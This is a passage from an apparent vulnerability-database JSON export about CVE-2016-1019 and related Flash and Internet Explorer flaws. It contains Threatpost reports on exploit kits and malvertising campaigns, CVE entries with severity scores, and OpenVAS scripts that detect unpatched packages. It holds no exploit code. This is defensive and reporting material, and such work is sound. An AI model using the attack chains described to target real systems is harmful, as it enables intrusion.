and 15, in the U.K. and United States, while continuing to spread banking malware elsewhere.\n\nMole encrypts files and demands 0.5 Bitcoin to receive a decryption key that unlocks scrambled data.\n\n\u201c[AdGholas malvertising](<https://threatpost.com/microsoft-shuts-down-zero-day-used-in-adgholas-malvertising-campaigns/120618/>) redirecting to the Astrum Exploit Kit is the most evolved blind mass infection chain known today,\u201d Kafeine wrote. \u201cFull HTTPS, heavy smart filtering, domain shadowing, Diffie-Hellman, and perfect knowledge of how the advertising industry operates allow these threat actors to lure large agencies to bring them high volumes of traffic from high-value website and targets.\u201d\n", "cvss3": {}, "published": "2017-06-20T14:27:43", "type": "threatpost", "title": "UCL Ransomware Linked to AdGholas Malvertising Group", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2017-06-20T18:27:43", "id": "THREATPOST:804E5F87A8DDC6B4C06A66CEE9F86A32", "href": "https://threatpost.com/university-college-london-ransomware-linked-to-adgholas-malvertising-group/126405/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:23", "description": "A nasty Adobe Flash zero-day vulnerability that was remediated in an [emergency update in October 2015](<https://threatpost.com/emergency-adobe-flash-zero-day-patch-arrives-ahead-of-schedule/115073/>) was thereafter co-opted by seven exploit kits, according to an analysis published today by researchers at Recorded Future.\n\nThe Adobe vulnerability, CVE-2015-7645, was also used by the Russian APT group known as APT 28, which laced spear phishing emails with exploits targeting foreign affairs ministries worldwide. APT 28, also known as Sofacy, frequently targets NATO-allied political targets and in November was [singled out by Microsoft](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) for using separate Flash and Windows zero days in targeted attacks this year.\n\nThe Flash bug was among the first to be used after Adobe implemented new mitigations into the software to combat memory-based attacks. Despite the improvements in Flash security, attackers still take a shine to these exploits.\n\nRecorded Future\u2019s report \u201c[New Kit, Same Player](<https://www.recordedfuture.com/top-vulnerabilities-2016/>)\u201d says that six of the top 10 vulnerabilities used in exploit kits were Flash Player bugs, followed by Internet Explorer, Windows and Silverlight exploits. None of this year\u2019s top 10 vulnerabilities were present in a similar analysis done last year.\n\nExploit kits, meanwhile, have been reduced in prominence since the disappearance of a number of popular kits, including Angler and Nuclear. Angler, in particular, was particularly popular with criminals; it was updated frequently and sold in a number of underground forums. The June arrest of a Russian cybercrime outfit behind the Lurk Trojan, however, spelled the end of days for Angler. Researchers at Kaspersky Lab [confirmed the connection](<https://securelist.com/analysis/publications/75944/the-hunt-for-lurk/>) between the [Lurk gang and Angler](<https://threatpost.com/inside-the-demise-of-the-angler-exploit-kit/120222/>) distribution in an August report.\n\nNonetheless, exploit kits remain a threat and a vehicle for attacks that include ransomware, click fraud and adware. Victims are compromised in a number of ways, including drive-by attacks, malvertising or links in emails, all of which direct the victim\u2019s browser to the exploit kit\u2019s landing page. Code on the page determines the browser being used and launches the exploit mostly likely to hit paydirt.\n\nCVE-2015-7645 was found in Angler, as well as in Neutrino, Magnitude, RIG, Nuclear Pack, Spartan and Hunter. It, by far, had the highest penetration into exploits kits, according to Recorded Future.\n\nBut since Angler\u2019s demise earlier this year, Sundown has risen to a measure of prominence with its maintainers updating the kit often with new exploits. Sundown\u2019s payload, however, differs in that it drops banking Trojans on users\u2019 machines. Recorded Future said this kit also relies on domain shadowing more than its counterparts in order to register subdomains that are used to host attacks.\n\nSundown also contained CVE-2016-0189, an [Internet Explorer bug](<https://threatpost.com/patched-ie-zero-day-incorporated-into-neutrino-ek/119321/>) used in targeted attacks against South Korean organizations earlier this year. Microsoft patched it in July, but already it had been used by Neutrino as well. The IE bug, Recorded Future said, was the top flaw found in exploit kits, referenced more than 600 times. CVE-2016-1019 and CVE-2016-4117, two other Flash Player bugs, round out the top three. [CVE-2016-4117](<https://securelist.com/blog/research/75100/operation-daybreak/>) was used by the [ScarCruft APT group](<https://threatpost.com/scarcruft-apt-group-used-latest-flash-zero-day-in-two-dozen-attacks/118642/>), Kaspersky Lab researchers said in June, in watering hole attacks.\n", "cvss3": {}, "published": "2016-12-06T13:58:56", "type": "threatpost", "title": "Flash Exploit Found in Seven Exploit Kits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-7645", "CVE-2016-0189", "CVE-2016-1019", "CVE-2016-4117"], "modified": "2016-12-07T14:36:02", "id": "THREATPOST:190D2D4CC706E0CF894B62979A2DA309", "href": "https://threatpost.com/flash-exploit-found-in-seven-exploit-kits/122284/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:15", "description": "Despite [a marked decrease in activity](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>), exploit kits haven\u2019t completely disappeared just yet. The Neptune, or Terror Exploit Kit, is alive and well; during the last month, researchers have observed the kit as part of a campaign to abuse a legitimate popup ad service to drop cryptocurrency miners.\n\nResearchers with FireEye [said Tuesday](<https://www.fireeye.com/blog/threat-research/2017/08/neptune-exploit-kit-malvertising.html>) the kit has been redirecting victims with popups from fake hiking ads to exploit kit landing pages and in turn to HTML and Adobe Flash exploits. Researchers elected not to disclose the name of the popup ad service, but stressed that it\u2019s within Alexa\u2019s top 100.\n\nThe landing pages run a handful of exploits, including three targeting Internet Explorer (CVE-2016-0189, CVE-2015-2419, CVE-2014-6332) and two targeting Flash (CVE-2015-8651, CVE-2015-7645).\n\nAccording to FireEye researchers Zain Gardezi and Manish Sardiwal, the malvertising redirects are mimicking the domains of actual hiking sites, and in some instances sites that allow users to convert YouTube videos to MP3s. Once redirected, the ads, most which appear on high-traffic torrent and multimedia hosting sites, drop a Monero miner.\n\nMonero, an open source cryptocurrency that bills itself as \u201csecure, private, and untraceable\u201d has caught on with cybercriminals over the last several months.\n\nOne cryptocurrency miner [Adylkuzz](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) was spotted in April using the same NSA Eternal Blue exploit and DoublePulsar rootkit that spread WannaCry, to infect computers and mine Monero.\n\nAccording to FireEye, for the new Neptune EK campaign a uniform resource identifier (URI) belonging to the exploit kit domain has been dropping the payload as a plain executable. After a machine has been infected, attempts are made to log in to minergate[.]com, a cryptocurrency GUI miner and mining pool, with the attacker\u2019s email address.\n\nResearchers noticed this campaign on July 16 and were able to pin it on changes in the kit\u2019s URI patterns.\n\nSpreading resource intensive cryptocurrency miners helps attackers raise small amounts of money that can potentially be used to fund other future attacks.\n\n[Attackers in June](<https://threatpost.com/attackers-mining-cryptocurrency-using-exploits-for-samba-vulnerability/126191/>) used an exploit for a Samba vulnerability patched in May to spread payloads that spread Monero miners. Researchers with Kaspersky Lab who discovered the operation said that attackers hardcoded their wallet and pool address into the attack and managed to raise $6,000 USD via the campaign.\n\nThe vulnerabilities that Neptune uses are dated; in fact Microsoft fixed one of them in November 2014, CVE-2014-6332, which could have allowed remote code execution via Windows OLE vulnerabilities. Gardezi and Sardiwal warn that users running out-of-date or unpatched software could still be at risk, especially as drive-by download kits such as Neptune have taken a shine to using malvertisements to push malicious downloads of late.\n\nSimilar to Sundown, the Neptune/Terror exploit kit is one of several that popped up following Angler\u2019s disappearance in 2016. Researchers said [in May earlier this year](<https://threatpost.com/terror-exploit-kit-evolves-into-larger-threat/125816/>) that the kit had adopted new anti-detection features and slowly evolved into a threat.\n", "cvss3": {}, "published": "2017-08-22T17:51:58", "type": "threatpost", "title": "Neptune Exploit Kit Dropping Cryptocurrency Miners Through Malvertisements", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2015-2419", "CVE-2015-7645", "CVE-2015-8651", "CVE-2016-0189"], "modified": "2017-08-22T21:51:58", "id": "THREATPOST:3F20438316043C71AAD9C85191711EEE", "href": "https://threatpost.com/neptune-exploit-kit-dropping-cryptocurrency-miners-through-malvertisements/127591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2022-05-04T14:21:52", "description": "Adobe Flash Player 21.0.0.197 and earlier allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T00:00:00", "type": "attackerkb", "title": "CVE-2016-1019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019"], "modified": "2020-06-05T00:00:00", "id": "AKB:1B9FE055-9F52-4311-A5FC-E996A72071B1", "href": "https://attackerkb.com/topics/0Vp2rXY6rx/cve-2016-1019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-17T02:33:17", "description": "JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \u201cJScript9 Memory Corruption Vulnerability.\u201d\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2015-2419", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2020-06-05T00:00:00", "id": "AKB:EE437A8A-C572-480C-AAFD-F336171F4417", "href": "https://attackerkb.com/topics/P1XXD2L59b/cve-2015-2419", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T19:57:20", "description": "Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code by overriding NetConnection object properties to leverage an unspecified \u201ctype confusion,\u201d a different vulnerability than CVE-2016-1019.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-09T00:00:00", "type": "attackerkb", "title": "CVE-2016-1015", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1015", "CVE-2016-1019"], "modified": "2020-06-05T00:00:00", "id": "AKB:491D573A-D9C4-4DBE-B502-578A6EF314AC", "href": "https://attackerkb.com/topics/1D61Z63nT2/cve-2016-1015", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-31T18:34:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-04-09T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2016:0990-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851268", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851268", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851268\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-04-09 05:01:00 +0200 (Sat, 09 Apr 2016)\");\n script_cve_id(\"CVE-2016-1019\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2016:0990-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"flash-player was updated to fix one security issue.\n\n This security issue was fixed:\n\n - CVE-2016-1019: Adobe Flash Player allowed remote attackers to cause a\n denial of service (application crash) or possibly execute arbitrary code\n via unspecified vectors, as exploited in the wild in April 2016\n (bsc#974209).\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:0990-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.616~126.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.616~126.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-18T17:13:36", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS16-050.", "cvss3": {}, "published": "2017-03-18T00:00:00", "type": "openvas", "title": "Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3154132)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2020-05-14T00:00:00", "id": "OPENVAS:1361412562310810666", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810666", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3154132)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810666\");\n script_version(\"2020-05-14T14:30:11+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_bugtraq_id(96525, 96593, 95209, 94354, 96181, 95376, 95869, 85933, 90952,\n 96858, 96849, 85926, 85932, 96014, 95935);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-14 14:30:11 +0000 (Thu, 14 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-18 16:00:37 +0530 (Sat, 18 Mar 2017)\");\n script_name(\"Microsoft IE And Microsoft Edge Flash Player Multiple Vulnerabilities (3154132)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Bulletin MS16-050.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple type confusion vulnerabilities.\n\n - Multiple use-after-free vulnerabilities.\n\n - Multiple memory corruption vulnerabilities.\n\n - A stack overflow vulnerability.\n\n - A vulnerability in the directory search path used to find resources.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass memory layout\n randomization mitigations, also leads to code execution.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 8.1 x32/x64\n\n - Microsoft Windows Server 2012/2012R2\n\n - Microsoft Windows 10 x32/x64\n\n - Microsoft Windows 10 Version 1511 x32/x64\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://technet.microsoft.com/library/security/MS16-050\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-10.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_flash_player_within_ie_edge_detect.nasl\");\n script_mandatory_keys(\"AdobeFlash/IE_or_EDGE/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012:1, win2012R2:1, win10:1,\n win10x64:1) <= 0)\n exit(0);\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player_internet_explorer\", \"cpe:/a:adobe:flash_player_edge\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\nif(path) {\n path += \"\\Flashplayerapp.exe\";\n} else {\n path = \"Could not find the install location\";\n}\n\nif(version_is_less(version:vers, test_version:\"21.0.0.213\")) {\n report = report_fixed_ver(file_checked:path, file_version:vers, vulnerable_range:\"Less than 21.0.0.213\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:17", "description": "Mageia Linux Local Security Checks mgasa-2016-0134", "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0134", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310131312", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131312", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0134.nasl 11856 2018-10-12 07:45:29Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131312\");\n script_version(\"$Revision: 11856 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:18:14 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 09:45:29 +0200 (Fri, 12 Oct 2018) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0134\");\n script_tag(name:\"insight\", value:\"Adobe Flash Player 11.2.202.616 contains fixes to critical security vulnerabilities found in earlier versions that could potentially allow an attacker to take control of the affected system.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0134.html\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\", \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\", \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\", \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\", \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\", \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0134\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"flash-player-plugin\", rpm:\"flash-player-plugin~11.2.202.616~1.mga5.nonfree\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-24T21:25:03", "description": "This host is installed with Adobe Flash Player\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2016-04-12T00:00:00", "type": "openvas", "title": "Adobe Flash Player Security Updates( apsb16-10 )-Windows", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1030", "CVE-2016-1020", "CVE-2016-1022", "CVE-2016-1026", "CVE-2016-1021", "CVE-2016-1019", "CVE-2016-1018", "CVE-2016-1013", "CVE-2016-1006", "CVE-2016-1023", "CVE-2016-1012", "CVE-2016-1033", "CVE-2016-1031", "CVE-2016-1029", "CVE-2016-1032", "CVE-2016-1028", "CVE-2016-1027", "CVE-2016-1014", "CVE-2016-1017", "CVE-2016-1011", "CVE-2016-1024", "CVE-2016-1025", "CVE-2016-1016", "CVE-2016-1015"], "modified": "2019-10-23T00:00:00", "id": "OPENVAS:1361412562310807653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807653", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Security Updates( apsb16-10 )-Windows\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807653\");\n script_version(\"2019-10-23T10:55:06+0000\");\n script_cve_id(\"CVE-2016-1006\", \"CVE-2016-1011\", \"CVE-2016-1012\", \"CVE-2016-1013\",\n \"CVE-2016-1014\", \"CVE-2016-1015\", \"CVE-2016-1016\", \"CVE-2016-1017\",\n \"CVE-2016-1018\", \"CVE-2016-1019\", \"CVE-2016-1020\", \"CVE-2016-1021\",\n \"CVE-2016-1022\", \"CVE-2016-1023\", \"CVE-2016-1024\", \"CVE-2016-1025\",\n \"CVE-2016-1026\", \"CVE-2016-1027\", \"CVE-2016-1028\", \"CVE-2016-1029\",\n \"CVE-2016-1030\", \"CVE-2016-1031\", \"CVE-2016-1032\", \"CVE-2016-1033\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n 